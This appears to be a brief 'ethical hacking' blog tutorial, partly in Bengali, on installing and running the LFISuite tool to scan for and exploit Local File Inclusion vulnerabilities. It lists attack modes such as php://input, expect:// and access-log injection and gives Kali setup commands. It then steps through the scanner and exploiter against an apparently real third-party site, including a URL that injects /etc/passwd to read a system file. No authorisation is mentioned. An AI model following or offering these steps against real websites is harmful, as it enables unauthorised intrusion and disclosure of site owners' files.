What is LFISuite?
LFI Suite is a totally automatic tool able to scan and exploit Local File Inclusion vulnerabilities using many different methods of attack, listed in the section
LFI Vulnerability কি?
LFI হল একটি ওয়েব দুর্বলতা যা ওয়েবসাইট বা ওয়েব অ্যাপ্লিকেশন প্রোগ্রামারদের ভুলের ফলে হয়। হ্যাকার Malicious ফাইলগুলি Inject করার জন্য এই দুর্বলতার সুবিধা নিতে পারে যার মাদ্ধমে ওয়েবসাইট / ওয়েব এপ্লিকেশন এ এক্সেস নিতে পারে।
LFI Suite Provides 8 different Local File Inclusion attack modalities:
● /proc/self/environ
● php://filter
● php://input
● /proc/self/fd
● access log
● phpinfo
● data://
● expect://
How to Use LFI Suite
> Kali > sudo su > password
> cd Desktop
> git clone https://github.com/D35m0nd142/LFISuite
> cd LFISuite
> ls
> la -la
> chmod +x lfisuite.py
> python2 lfisuite.py
If you get error put this cmd in kali
cp -r /usr/lib/python3/dist-packages/termcolor.py /usr/lib/python2.7/dist-packages
LFI Suite Scanner
● for scan select 2
● cookoies: enter
● tor proxy: no
● paths: enter
● url to scan: https://ravagedband.com/index.php?page=home.php
Check LFI Vulnerability
LFI Suite will scan your link and find LFI Vulnerability of your link (CNTRL + Z to stop scanning)
LFI Suite Exploiter
● for Exploiter select 1
● cookoies: enter
● tor proxy: no
● choose payloads: 1
● enter Vulnerabile URL: https://ravagedband.com/index.php?page=/etc/passwd
● choose parameter: 1
Now it will show you the result
Read more ethical hacking blogs from here.
